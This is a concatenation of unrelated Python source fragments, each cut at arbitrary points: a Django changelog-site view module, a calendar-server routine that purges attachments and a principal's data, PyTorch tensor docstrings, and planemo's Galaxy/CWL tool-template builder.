package_data = get_package_data_for_template(
obj,
filter_args,
10,
None)
has_results = len(package_data['versions'])
if self.preview.status == 'error':
problem = self.preview.problem
else:
if self.preview.status == 'success' and not has_results:
problem = 'Unable to find changelog.'
else:
problem = None
result['package'] = package_data
result['has_results'] = has_results
result['problem'] = problem
# TODO: вот это всё надо будет убрать и оставить
# только рендеринг changelog
HUMANIZED = {
'waiting-in-the-queue': 'Waiting in the queue.',
'downloading': 'Downloading sources.',
'searching-versions': 'Searching versions.',
'updating-database': 'Updating database.',
}
status = self.preview.get_processing_status()
result['processing_status'] = HUMANIZED.get(status, status)
return result
def post(self, *args, **kwargs):
preview = Preview.objects.get(pk=kwargs['pk'])
def parse_list(text):
for line in re.split(r'[\n,]', text):
yield line.strip()
if preview.light_user == self.request.light_user or (
self.request.user.is_authenticated() and
self.request.user == preview.user):
data = anyjson.deserialize(self.request.read())
preview.set_search_list(
parse_list(data.get('search_list', '')))
preview.set_ignore_list(
parse_list(data.get('ignore_list', '')))
preview.xslt = data.get('xslt', '')
if preview.source != data.get('source'):
preview.downloader = None
preview.source = data.get('source')
preview.downloader = data.get('downloader')
preview.set_status('processing')
preview.save()
preview.schedule_update()
return HttpResponse('ok')
class IndexView(CommonContextMixin, TemplateView):
def get_context_data(self, **kwargs):
result = super(IndexView, self).get_context_data(**kwargs)
if self.request.user.is_authenticated():
UserHistoryLog.write(self.request.user,
self.request.light_user,
'index-view',
'User opened an index page.')
else:
UserHistoryLog.write(self.request.user,
self.request.light_user,
'landing-digest-view',
'User opened a landing page with digest.')
return result
def get_template_names(self):
if self.request.user.is_authenticated():
return ['allmychanges/login-index.html']
return ['allmychanges/index.html']
class IssuesFilterForm(forms.Form):
resolved = forms.BooleanField(required=False)
page = forms.IntegerField(required=False)
page_size = forms.IntegerField(required=False)
namespace = forms.CharField(required=False)
name = forms.CharField(required=False)
type = forms.CharField(required=False)
username = forms.CharField(required=False)
from_user = forms.BooleanField(required=False)
order = forms.CharField(required=False)
class IssuesView(CommonContextMixin, TemplateView):
template_name = 'allmychanges/issues.html'
def get_context_data(self, **kwargs):
result = super(IssuesView, self).get_context_data(**kwargs)
form = IssuesFilterForm(self.request.GET)
if not form.is_valid():
raise Http404
order_by = form.cleaned_data['order'] or '-importance'
queryset = Issue.objects.order_by(order_by)
page = form.cleaned_data['page'] or 1
page_size = form.cleaned_data['page_size'] or 20
if form.cleaned_data['resolved']:
# if requested, show resolved issues or all
if form.cleaned_data['resolved'] != 'any':
queryset = queryset.exclude(resolved_at=None)
result['title'] = 'Resolved issues'
else:
# by default, show only resolved issues
queryset = queryset.filter(resolved_at=None)
result['title'] = 'Issues'
if form.cleaned_data['namespace']:
result['show_back_button'] = True
queryset = queryset.filter(changelog__namespace=form.cleaned_data['namespace'])
if form.cleaned_data['name']:
queryset = queryset.filter(changelog__name=form.cleaned_data['name'])
if form.cleaned_data['type']:
result['show_back_button'] = True
queryset = queryset.filter(type=form.cleaned_data['type'])
if form.cleaned_data['username']:
queryset = queryset.filter(user__username=form.cleaned_data['username'])
if form.cleaned_data['from_user']:
queryset = queryset.exclude(light_user__isnull=True)
total_count = queryset.count()
skip = (page - 1) * page_size
to = skip + page_size
next_page = page + 1
result['total_issues'] = total_count
result['next_page'] = next_page
result['page_size'] = page_size
result['skip'] = skip
result['to'] = to
result['issues'] = queryset[skip:to]
| |
if user in byuser:
byuser[user] = byuser[user]._replace(managedSize=size, managedCount=count)
else:
byuser[user] = ByUserData(quota=quota, orphanSize=0, orphanCount=0, dropboxSize=0, dropboxCount=0, managedSize=size, managedCount=count)
# Print table of results
table = tables.Table()
table.addHeader(("User", "Current Quota", "Orphan Size", "Orphan Count", "Dropbox Size", "Dropbox Count", "Managed Size", "Managed Count", "Total Size", "Total Count"))
table.setDefaultColumnFormats((
tables.Table.ColumnFormat("%s", tables.Table.ColumnFormat.LEFT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
))
totals = [0] * 8
for user, data in sorted(byuser.items(), key=lambda x: x[0]):
cols = (
data.orphanSize,
data.orphanCount,
data.dropboxSize,
data.dropboxCount,
data.managedSize,
data.managedCount,
data.orphanSize + data.dropboxSize + data.managedSize,
data.orphanCount + data.dropboxCount + data.managedCount,
)
table.addRow((user, data.quota,) + cols)
for ctr, value in enumerate(cols):
totals[ctr] += value
table.addFooter(("Total:", "",) + tuple(totals))
total = totals[7]
print("\n")
print("Orphaned/Old Attachments by User:\n")
table.printTable()
else:
total = sum([x[3] for x in orphans]) + sum([x[3] for x in dropbox]) + sum([x[3] for x in managed])
return total
@inlineCallbacks
def _orphansPurge(self):
if self.verbose:
print("Removing orphaned attachments...",)
numOrphansRemoved = -1
totalRemoved = 0
while numOrphansRemoved:
txn = self.store.newTransaction(label="Remove orphaned attachments")
numOrphansRemoved = yield txn.removeOrphanedAttachments(self.uuid, batchSize=self.batchSize)
yield txn.commit()
if numOrphansRemoved:
totalRemoved += numOrphansRemoved
if self.verbose:
print(" %d," % (totalRemoved,),)
elif self.verbose:
print("")
if self.verbose:
if totalRemoved == 0:
print("No orphaned attachments were removed")
elif totalRemoved == 1:
print("1 orphaned attachment was removed in total")
else:
print("%d orphaned attachments were removed in total" % (totalRemoved,))
print("")
returnValue(totalRemoved)
@inlineCallbacks
def _dropboxPurge(self):
if self.verbose:
print("Removing old dropbox attachments...",)
numOldRemoved = -1
totalRemoved = 0
while numOldRemoved:
txn = self.store.newTransaction(label="Remove old dropbox attachments")
numOldRemoved = yield txn.removeOldDropboxAttachments(self.cutoff, self.uuid, batchSize=self.batchSize)
yield txn.commit()
if numOldRemoved:
totalRemoved += numOldRemoved
if self.verbose:
print(" %d," % (totalRemoved,),)
elif self.verbose:
print("")
if self.verbose:
if totalRemoved == 0:
print("No old dropbox attachments were removed")
elif totalRemoved == 1:
print("1 old dropbox attachment was removed in total")
else:
print("%d old dropbox attachments were removed in total" % (totalRemoved,))
print("")
returnValue(totalRemoved)
@inlineCallbacks
def _managedPurge(self):
if self.verbose:
print("Removing old managed attachments...",)
numOldRemoved = -1
totalRemoved = 0
while numOldRemoved:
txn = self.store.newTransaction(label="Remove old managed attachments")
numOldRemoved = yield txn.removeOldManagedAttachments(self.cutoff, self.uuid, batchSize=self.batchSize)
yield txn.commit()
if numOldRemoved:
totalRemoved += numOldRemoved
if self.verbose:
print(" %d," % (totalRemoved,),)
elif self.verbose:
print("")
if self.verbose:
if totalRemoved == 0:
print("No old managed attachments were removed")
elif totalRemoved == 1:
print("1 old managed attachment was removed in total")
else:
print("%d old managed attachments were removed in total" % (totalRemoved,))
print("")
returnValue(totalRemoved)
class PurgePrincipalService(WorkerService):
root = None
directory = None
uids = None
dryrun = False
verbose = False
proxies = True
when = None
@classmethod
def usage(cls, e=None):
name = os.path.basename(sys.argv[0])
print("usage: %s [options]" % (name,))
print("")
print(" Remove a principal's events and contacts from the calendar server")
print(" Future events are declined or cancelled")
print("")
print("options:")
print(" -h --help: print this help and exit")
print(" -f --config <path>: Specify caldavd.plist configuration path")
print(" -n --dry-run: calculate how many events and contacts to purge, but do not purge data")
print(" -v --verbose: print progress information")
print(" -D --debug: debug logging")
print("")
if e:
sys.stderr.write("%s\n" % (e,))
sys.exit(64)
else:
sys.exit(0)
@classmethod
def main(cls):
try:
(optargs, args) = getopt(
sys.argv[1:], "Df:hnv", [
"dry-run",
"config=",
"help",
"verbose",
"debug",
],
)
except GetoptError, e:
cls.usage(e)
#
# Get configuration
#
configFileName = None
dryrun = False
verbose = False
debug = False
for opt, arg in optargs:
if opt in ("-h", "--help"):
cls.usage()
elif opt in ("-v", "--verbose"):
verbose = True
elif opt in ("-D", "--debug"):
debug = True
elif opt in ("-n", "--dry-run"):
dryrun = True
elif opt in ("-f", "--config"):
configFileName = arg
else:
raise NotImplementedError(opt)
# args is a list of uids
cls.uids = args
cls.dryrun = dryrun
cls.verbose = verbose
utilityMain(
configFileName,
cls,
verbose=debug,
)
@classmethod
@inlineCallbacks
def purgeUIDs(cls, store, directory, uids, verbose=False, dryrun=False,
proxies=True, when=None):
service = cls(store)
service.directory = directory
service.uids = uids
service.verbose = verbose
service.dryrun = dryrun
service.proxies = proxies
service.when = when
result = yield service.doWork()
returnValue(result)
@inlineCallbacks
def doWork(self):
if self.directory is None:
self.directory = self.store.directoryService()
total = 0
for uid in self.uids:
count = yield self._purgeUID(uid)
total += count
if self.verbose:
amount = "%d event%s" % (total, "s" if total > 1 else "")
if self.dryrun:
print("Would have modified or deleted %s" % (amount,))
else:
print("Modified or deleted %s" % (amount,))
returnValue(total)
@inlineCallbacks
def _purgeUID(self, uid):
if self.when is None:
self.when = DateTime.getNowUTC()
cuas = set((
"urn:uuid:{}".format(uid),
"urn:x-uid:{}".format(uid)
))
# See if calendar home is provisioned
txn = self.store.newTransaction()
storeCalHome = yield txn.calendarHomeWithUID(uid)
calHomeProvisioned = storeCalHome is not None
# Always, unshare collections, remove notifications
if calHomeProvisioned:
yield self._cleanHome(txn, storeCalHome)
yield txn.commit()
count = 0
if calHomeProvisioned:
count = yield self._cancelEvents(txn, uid, cuas)
# Remove empty calendar collections (and calendar home if no more
# calendars)
yield self._removeCalendarHome(uid)
# Remove VCards
count += (yield self._removeAddressbookHome(uid))
if self.proxies and not self.dryrun:
if self.verbose:
print("Deleting any proxy assignments")
yield self._purgeProxyAssignments(self.store, uid)
returnValue(count)
@inlineCallbacks
def _cleanHome(self, txn, storeCalHome):
# Process shared and shared-to-me calendars
children = list((yield storeCalHome.children()))
for child in children:
if self.verbose:
if self.dryrun:
print("Would unshare: %s" % (child.name(),))
else:
print("Unsharing: %s" % (child.name(),))
if not self.dryrun:
yield child.unshare()
if not self.dryrun:
yield storeCalHome.removeUnacceptedShares()
notificationHome = yield txn.notificationsWithUID(storeCalHome.uid())
if notificationHome is not None:
yield notificationHome.purge()
@inlineCallbacks
def _cancelEvents(self, txn, uid, cuas):
# Anything in the past is left alone
whenString = self.when.getText()
query_filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
caldavxml.TimeRange(start=whenString,),
name=("VEVENT",),
),
name="VCALENDAR",
)
)
query_filter = Filter(query_filter)
count = 0
txn = self.store.newTransaction()
storeCalHome = yield txn.calendarHomeWithUID(uid)
calendarNames = yield storeCalHome.listCalendars()
yield txn.commit()
for calendarName in calendarNames:
txn = self.store.newTransaction(authz_uid=uid)
storeCalHome = yield txn.calendarHomeWithUID(uid)
calendar = yield storeCalHome.calendarWithName(calendarName)
allChildNames = []
futureChildNames = set()
# Only purge owned calendars
if calendar.owned():
# all events
for childName in (yield calendar.listCalendarObjects()):
allChildNames.append(childName)
# events matching filter
for childName, _ignore_childUid, _ignore_childType in (yield calendar.search(query_filter)):
futureChildNames.add(childName)
yield txn.commit()
for childName in allChildNames:
txn = self.store.newTransaction(authz_uid=uid)
storeCalHome = yield txn.calendarHomeWithUID(uid)
calendar = yield storeCalHome.calendarWithName(calendarName)
doScheduling = childName in futureChildNames
try:
childResource = yield calendar.calendarObjectWithName(childName)
uri = "/calendars/__uids__/%s/%s/%s" % (storeCalHome.uid(), calendar.name(), childName)
incrementCount = self.dryrun
if self.verbose:
if self.dryrun:
print("Would delete%s: %s" % (" with scheduling" if doScheduling else "", uri,))
else:
print("Deleting%s: %s" % (" with scheduling" if doScheduling else "", uri,))
if not self.dryrun:
retry = False
try:
yield childResource.purge(implicitly=doScheduling)
incrementCount = True
except Exception, e:
print("Exception deleting %s: %s" % (uri, str(e)))
retry = True
if retry and doScheduling:
# Try again with implicit scheduling off
print("Retrying deletion of %s with scheduling turned off" % (uri,))
try:
yield childResource.purge(implicitly=False)
incrementCount = True
except Exception, e:
print("Still couldn't delete %s even with scheduling turned off: %s" % (uri, str(e)))
if incrementCount:
count += 1
# Commit
yield txn.commit()
except Exception, e:
# Abort
yield txn.abort()
raise e
returnValue(count)
@inlineCallbacks
def _removeCalendarHome(self, uid):
try:
txn = self.store.newTransaction(authz_uid=uid)
# Remove empty calendar collections (and calendar home if no more
# calendars)
storeCalHome = yield txn.calendarHomeWithUID(uid)
if storeCalHome is not None:
calendars = list((yield storeCalHome.calendars()))
calendars.extend(list((yield storeCalHome.calendars(onlyInTrash=True))))
remainingCalendars = len(calendars)
for calColl in calendars:
if len(list((yield calColl.calendarObjects()))) == 0:
remainingCalendars -= 1
calendarName = calColl.name()
if self.verbose:
if self.dryrun:
print("Would delete calendar: %s" % (calendarName,))
else:
print("Deleting calendar: %s" % (calendarName,))
if not self.dryrun:
if calColl.owned():
yield storeCalHome.removeChildWithName(calendarName, useTrash=False)
else:
yield calColl.unshare()
if not remainingCalendars:
if self.verbose:
if self.dryrun:
print("Would delete calendar home")
else:
print("Deleting calendar home")
if not self.dryrun:
# Queue a job to delete the calendar home after any scheduling operations
# are complete
notBefore = (
datetime.datetime.utcnow() +
datetime.timedelta(seconds=config.AutomaticPurging.HomePurgeDelaySeconds)
)
yield txn.enqueue(
PrincipalPurgeHomeWork,
homeResourceID=storeCalHome.id(),
notBefore=notBefore
)
# Also mark the home as purging so it won't be looked at again during
# purge polling
yield storeCalHome.purge()
# Commit
yield txn.commit()
except Exception, e:
# Abort
yield txn.abort()
raise e
@inlineCallbacks
def _removeAddressbookHome(self, uid):
count = 0
txn = self.store.newTransaction(authz_uid=uid)
try:
# Remove VCards
storeAbHome = yield txn.addressbookHomeWithUID(uid)
if storeAbHome is not None:
for abColl | |
torch.tensor([[1, 2], [3, 4], [5, 6]])
>>> x.resize_(2, 2)
tensor([[ 1, 2],
[ 3, 4]])
""")
add_docstr_all('resize_as_',
r"""
resize_as_(tensor) -> Tensor
Resizes the :attr:`self` tensor to be the same size as the specified
:attr:`tensor`. This is equivalent to ``self.resize_(tensor.size())``.
""")
add_docstr_all('rot90',
r"""
rot90(k, dims) -> Tensor
See :func:`torch.rot90`
""")
add_docstr_all('round',
r"""
round() -> Tensor
See :func:`torch.round`
""")
add_docstr_all('round_',
r"""
round_() -> Tensor
In-place version of :meth:`~Tensor.round`
""")
add_docstr_all('rsqrt',
r"""
rsqrt() -> Tensor
See :func:`torch.rsqrt`
""")
add_docstr_all('rsqrt_',
r"""
rsqrt_() -> Tensor
In-place version of :meth:`~Tensor.rsqrt`
""")
add_docstr_all('scatter_',
r"""
scatter_(dim, index, src) -> Tensor
Writes all values from the tensor :attr:`src` into :attr:`self` at the indices
specified in the :attr:`index` tensor. For each value in :attr:`src`, its output
index is specified by its index in :attr:`src` for ``dimension != dim`` and by
the corresponding value in :attr:`index` for ``dimension = dim``.
For a 3-D tensor, :attr:`self` is updated as::
self[index[i][j][k]][j][k] = src[i][j][k] # if dim == 0
self[i][index[i][j][k]][k] = src[i][j][k] # if dim == 1
self[i][j][index[i][j][k]] = src[i][j][k] # if dim == 2
This is the reverse operation of the manner described in :meth:`~Tensor.gather`.
:attr:`self`, :attr:`index` and :attr:`src` (if it is a Tensor) should have same
number of dimensions. It is also required that ``index.size(d) <= src.size(d)``
for all dimensions ``d``, and that ``index.size(d) <= self.size(d)`` for all
dimensions ``d != dim``.
Moreover, as for :meth:`~Tensor.gather`, the values of :attr:`index` must be
between ``0`` and ``self.size(dim) - 1`` inclusive, and all values in a row
along the specified dimension :attr:`dim` must be unique.
Args:
dim (int): the axis along which to index
index (LongTensor): the indices of elements to scatter,
can be either empty or the same size of src.
When empty, the operation returns identity
src (Tensor or float): the source element(s) to scatter
Example::
>>> x = torch.rand(2, 5)
>>> x
tensor([[ 0.3992, 0.2908, 0.9044, 0.4850, 0.6004],
[ 0.5735, 0.9006, 0.6797, 0.4152, 0.1732]])
>>> torch.zeros(3, 5).scatter_(0, torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]]), x)
tensor([[ 0.3992, 0.9006, 0.6797, 0.4850, 0.6004],
[ 0.0000, 0.2908, 0.0000, 0.4152, 0.0000],
[ 0.5735, 0.0000, 0.9044, 0.0000, 0.1732]])
>>> z = torch.zeros(2, 4).scatter_(1, torch.tensor([[2], [3]]), 1.23)
>>> z
tensor([[ 0.0000, 0.0000, 1.2300, 0.0000],
[ 0.0000, 0.0000, 0.0000, 1.2300]])
""")
add_docstr_all('scatter_add_',
r"""
scatter_add_(dim, index, other) -> Tensor
Adds all values from the tensor :attr:`other` into :attr:`self` at the indices
specified in the :attr:`index` tensor in a similar fashion as
:meth:`~torch.Tensor.scatter_`. For each value in :attr:`other`, it is added to
an index in :attr:`self` which is specified by its index in :attr:`other`
for ``dimension != dim`` and by the corresponding value in :attr:`index` for
``dimension = dim``.
For a 3-D tensor, :attr:`self` is updated as::
self[index[i][j][k]][j][k] += other[i][j][k] # if dim == 0
self[i][index[i][j][k]][k] += other[i][j][k] # if dim == 1
self[i][j][index[i][j][k]] += other[i][j][k] # if dim == 2
:attr:`self`, :attr:`index` and :attr:`other` should have same number of
dimensions. It is also required that ``index.size(d) <= other.size(d)`` for all
dimensions ``d``, and that ``index.size(d) <= self.size(d)`` for all dimensions
``d != dim``.
Moreover, as for :meth:`~Tensor.gather`, the values of :attr:`index` must be
between ``0`` and ``self.size(dim) - 1`` inclusive, and all values in a row along
the specified dimension :attr:`dim` must be unique.
.. include:: cuda_deterministic.rst
Args:
dim (int): the axis along which to index
index (LongTensor): the indices of elements to scatter and add,
can be either empty or the same size of src.
When empty, the operation returns identity.
other (Tensor): the source elements to scatter and add
Example::
>>> x = torch.rand(2, 5)
>>> x
tensor([[0.7404, 0.0427, 0.6480, 0.3806, 0.8328],
[0.7953, 0.2009, 0.9154, 0.6782, 0.9620]])
>>> torch.ones(3, 5).scatter_add_(0, torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]]), x)
tensor([[1.7404, 1.2009, 1.9154, 1.3806, 1.8328],
[1.0000, 1.0427, 1.0000, 1.6782, 1.0000],
[1.7953, 1.0000, 1.6480, 1.0000, 1.9620]])
""")
add_docstr_all('select',
r"""
select(dim, index) -> Tensor
Slices the :attr:`self` tensor along the selected dimension at the given index.
This function returns a tensor with the given dimension removed.
Args:
dim (int): the dimension to slice
index (int): the index to select with
.. note::
:meth:`select` is equivalent to slicing. For example,
``tensor.select(0, index)`` is equivalent to ``tensor[index]`` and
``tensor.select(2, index)`` is equivalent to ``tensor[:,:,index]``.
""")
add_docstr_all('set_',
r"""
set_(source=None, storage_offset=0, size=None, stride=None) -> Tensor
Sets the underlying storage, size, and strides. If :attr:`source` is a tensor,
:attr:`self` tensor will share the same storage and have the same size and
strides as :attr:`source`. Changes to elements in one tensor will be reflected
in the other.
If :attr:`source` is a :class:`~torch.Storage`, the method sets the underlying
storage, offset, size, and stride.
Args:
source (Tensor or Storage): the tensor or storage to use
storage_offset (int, optional): the offset in the storage
size (torch.Size, optional): the desired size. Defaults to the size of the source.
stride (tuple, optional): the desired stride. Defaults to C-contiguous strides.
""")
add_docstr_all('sigmoid',
r"""
sigmoid() -> Tensor
See :func:`torch.sigmoid`
""")
add_docstr_all('sigmoid_',
r"""
sigmoid_() -> Tensor
In-place version of :meth:`~Tensor.sigmoid`
""")
add_docstr_all('sign',
r"""
sign() -> Tensor
See :func:`torch.sign`
""")
add_docstr_all('sign_',
r"""
sign_() -> Tensor
In-place version of :meth:`~Tensor.sign`
""")
add_docstr_all('sin',
r"""
sin() -> Tensor
See :func:`torch.sin`
""")
add_docstr_all('sin_',
r"""
sin_() -> Tensor
In-place version of :meth:`~Tensor.sin`
""")
add_docstr_all('sinh',
r"""
sinh() -> Tensor
See :func:`torch.sinh`
""")
add_docstr_all('sinh_',
r"""
sinh_() -> Tensor
In-place version of :meth:`~Tensor.sinh`
""")
add_docstr_all('size',
r"""
size() -> torch.Size
Returns the size of the :attr:`self` tensor. The returned value is a subclass of
:class:`tuple`.
Example::
>>> torch.empty(3, 4, 5).size()
torch.Size([3, 4, 5])
""")
add_docstr_all('sort',
r"""
sort(dim=None, descending=False) -> (Tensor, LongTensor)
See :func:`torch.sort`
""")
add_docstr_all('sparse_dim',
r"""
sparse_dim() -> int
If :attr:`self` is a sparse COO tensor (i.e., with ``torch.sparse_coo`` layout),
this returns a the number of sparse dimensions. Otherwise, this throws an
error.
See also :meth:`Tensor.dense_dim`.
""")
add_docstr_all('sqrt',
r"""
sqrt() -> Tensor
See :func:`torch.sqrt`
""")
add_docstr_all('sqrt_',
r"""
sqrt_() -> Tensor
In-place version of :meth:`~Tensor.sqrt`
""")
add_docstr_all('squeeze',
r"""
squeeze(dim=None) -> Tensor
See :func:`torch.squeeze`
""")
add_docstr_all('squeeze_',
r"""
squeeze_(dim=None) -> Tensor
In-place version of :meth:`~Tensor.squeeze`
""")
add_docstr_all('std',
r"""
std(dim=None, unbiased=True, keepdim=False) -> Tensor
See :func:`torch.std`
""")
add_docstr_all('storage',
r"""
storage() -> torch.Storage
Returns the underlying storage
""")
add_docstr_all('storage_offset',
r"""
storage_offset() -> int
Returns :attr:`self` tensor's offset in the underlying storage in terms of
number of storage elements (not bytes).
Example::
>>> x = torch.tensor([1, 2, 3, 4, 5])
>>> x.storage_offset()
0
>>> x[3:].storage_offset()
3
""")
add_docstr_all('stride',
r"""
stride(dim) -> tuple or int
Returns the stride of :attr:`self` tensor.
Stride is the jump necessary to go from one element to the next one in the
specified dimension :attr:`dim`. A tuple of all strides is returned when no
argument is passed in. Otherwise, an integer value is returned as the stride in
the particular dimension :attr:`dim`.
Args:
dim (int, optional): the desired dimension in which stride is required
Example::
>>> x = torch.tensor([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]])
>>> x.stride()
(5, 1)
>>>x.stride(0)
5
>>> x.stride(-1)
1
""")
add_docstr_all('sub',
r"""
sub(value, other) -> Tensor
Subtracts a scalar or tensor from :attr:`self` tensor. If both :attr:`value` and
:attr:`other` are specified, each element of :attr:`other` is scaled by
:attr:`value` before being used.
When :attr:`other` is a tensor, the shape of :attr:`other` must be
:ref:`broadcastable <broadcasting-semantics>` with the shape of the underlying
tensor.
""")
add_docstr_all('sub_',
r"""
sub_(x) -> Tensor
In-place version of :meth:`~Tensor.sub`
""")
add_docstr_all('sum',
r"""
sum(dim=None, keepdim=False, dtype=None) -> Tensor
See :func:`torch.sum`
""")
add_docstr_all('svd',
r"""
svd(some=True, compute_uv=True) -> (Tensor, Tensor, Tensor)
See :func:`torch.svd`
""")
add_docstr_all('symeig',
r"""
symeig(eigenvectors=False, upper=True) -> (Tensor, Tensor)
See :func:`torch.symeig`
""")
add_docstr_all('t',
r"""
t() -> Tensor
See :func:`torch.t`
""")
add_docstr_all('t_',
r"""
t_() -> Tensor
In-place version of :meth:`~Tensor.t`
""")
add_docstr_all('to',
r"""
to(*args, **kwargs) -> Tensor
Performs Tensor dtype and/or device conversion. A :class:`torch.dtype` and :class:`torch.device` are
inferred from the arguments of ``self.to(*args, **kwargs)``.
.. note::
If the ``self`` Tensor already
has the correct :class:`torch.dtype` and :class:`torch.device`, then ``self`` is returned.
Otherwise, the returned tensor is a copy of ``self`` with the desired
:class:`torch.dtype` and :class:`torch.device`.
Here are the ways to call ``to``:
.. function:: to(dtype, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with the specified :attr:`dtype`
.. function:: to(device=None, dtype=None, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with the specified :attr:`device` and (optional)
:attr:`dtype`. If :attr:`dtype` is ``None`` it is inferred to be ``self.dtype``.
When :attr:`non_blocking`, tries to convert asynchronously with respect to
the host if possible, e.g., converting a CPU Tensor with pinned memory to a
CUDA Tensor.
When :attr:`copy` is set, a new Tensor is created even when the Tensor
already matches the desired conversion.
.. function:: to(other, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with same :class:`torch.dtype` and :class:`torch.device` as
the Tensor :attr:`other`. When :attr:`non_blocking`, tries to convert
asynchronously with respect to the host if possible, e.g., converting a CPU
Tensor with pinned memory to a CUDA Tensor.
When :attr:`copy` is set, a new Tensor is created even when the Tensor
already matches the desired conversion.
Example::
>>> tensor = torch.randn(2, 2) # Initially dtype=float32, device=cpu
>>> tensor.to(torch.float64)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], dtype=torch.float64)
>>> cuda0 = torch.device('cuda:0')
>>> tensor.to(cuda0)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], device='cuda:0')
>>> tensor.to(cuda0, dtype=torch.float64)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], dtype=torch.float64, device='cuda:0')
>>> other = torch.randn((), | |
<gh_stars>0
"""This module contains :func:`build` to build tool descriptions.
This class is used by the `tool_init` command and can be used to build
Galaxy and CWL tool descriptions.
"""
import os
import re
import shlex
import shutil
import subprocess
from collections import namedtuple
from planemo import io
from planemo import templates
REUSING_MACROS_MESSAGE = ("Macros file macros.xml already exists, assuming "
" it has relevant planemo-generated definitions.")
DEFAULT_CWL_VERSION = "v1.0"
TOOL_TEMPLATE = """<tool id="{{id}}" name="{{name}}" version="{{version}}">
{%- if description %}
<description>{{ description }}</description>
{%- endif %}
{%- if macros %}
<macros>
<import>macros.xml</import>
</macros>
<expand macro="requirements" />
{%- if version_command %}
<expand macro="version_command" />
{%- endif %}
{%- else %}
<requirements>
{%- for requirement in requirements %}
{{ requirement }}
{%- endfor %}
{%- for container in containers %}
{{ container }}
{%- endfor %}
</requirements>
{%- if version_command %}
<version_command>{{ version_command }}</version_command>
{%- endif %}
{%- endif %}
<command detect_errors="exit_code"><![CDATA[
{%- if command %}
{{ command }}
{%- else %}
TODO: Fill in command template.
{%- endif %}
]]></command>
<inputs>
{%- for input in inputs %}
{{ input }}
{%- endfor %}
</inputs>
<outputs>
{%- for output in outputs %}
{{ output }}
{%- endfor %}
</outputs>
{%- if tests %}
<tests>
{%- for test in tests %}
<test>
{%- for param in test.params %}
<param name="{{ param[0]}}" value="{{ param[1] }}"/>
{%- endfor %}
{%- for output in test.outputs %}
<output name="{{ output[0] }}" file="{{ output[1] }}"/>
{%- endfor %}
</test>
{%- endfor %}
</tests>
{%- endif %}
<help><![CDATA[
{%- if help %}
{{ help }}
{%- else %}
TODO: Fill in help.
{%- endif %}
]]></help>
{%- if macros %}
<expand macro="citations" />
{%- else %}
{%- if doi or bibtex_citations %}
<citations>
{%- for single_doi in doi %}
<citation type="doi">{{ single_doi }}</citation>
{%- endfor %}
{%- for bibtex_citation in bibtex_citations %}
<citation type="bibtex">{{ bibtex_citation }}</citation>
{%- endfor %}
</citations>
{%- endif %}
{%- endif %}
</tool>
"""
MACROS_TEMPLATE = """<macros>
<xml name="requirements">
<requirements>
{%- for requirement in requirements %}
{{ requirement }}
{%- endfor %}
<yield/>
{%- for container in containers %}
{{ container }}
{%- endfor %}
</requirements>
</xml>
<xml name="citations">
<citations>
{%- for single_doi in doi %}
<citation type="doi">{{ single_doi }}</citation>
{%- endfor %}
{%- for bibtex_citation in bibtex_citations %}
<citation type="bibtex">{{ bibtex_citation }}</citation>
{%- endfor %}
<yield />
</citations>
</xml>
{%- if version_command %}
<xml name="version_command">
<version_command>{{ version_command }}</version_command>
</xml>
{%- endif %}
</macros>
"""
CWL_TEMPLATE = """#!/usr/bin/env cwl-runner
cwlVersion: '{{cwl_version}}'
class: CommandLineTool
id: "{{id}}"
label: "{{label}}"
{%- if containers or requirements %}
hints:
{%- for container in containers %}
DockerRequirement:
dockerPull: {{ container.image_id }}
{%- endfor %}
{%- if requirements %}
SoftwareRequirement:
packages:
{%- for requirement in requirements %}
- package: {{ requirement.name }}
{%- if requirement.version %}
version:
- "{{ requirement.version }}"
{%- else %}
version: []
{%- endif %}
{%- endfor %}
{%- endif %}
{%- endif %}
{%- if inputs or outputs %}
inputs:
{%- for input in inputs %}
{{ input.id }}:
type: {{ input.type }}
doc: |
TODO
inputBinding:
position: {{ input.position }}
{%- if input.prefix %}
prefix: "{{input.prefix.prefix}}"
{%- if not input.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endfor %}
{%- for output in outputs %}
{%- if output.require_filename %}
{{ output.id }}:
type: string
doc: |
Filename for output {{ output.id }}
inputBinding:
position: {{ output.position }}
{%- if output.prefix %}
prefix: "{{output.prefix.prefix}}"
{%- if not output.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endif %}
{%- endfor %}
{%- else %}
inputs: [] # TODO
{%- endif %}
{%- if outputs %}
outputs:
{%- for output in outputs %}
{{ output.id }}:
type: File
outputBinding:
glob: {{ output.glob }}
{%- endfor %}
{%- else %}
outputs: [] # TODO
{%- endif %}
{%- if base_command %}
baseCommand:
{%- for base_command_part in base_command %}
- "{{ base_command_part}}"
{%- endfor %}
{%- else %}
baseCommand: []
{%- endif %}
{%- if arguments %}
arguments:
{%- for argument in arguments %}
- valueFrom: "{{ argument.value }}"
position: {{ argument.position }}
{%- if argument.prefix %}
prefix: "{{argument.prefix.prefix}}"
{%- if not argument.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endfor %}
{%- else %}
arguments: []
{%- endif %}
{%- if stdout %}
stdout: {{ stdout }}
{%- endif %}
doc: |
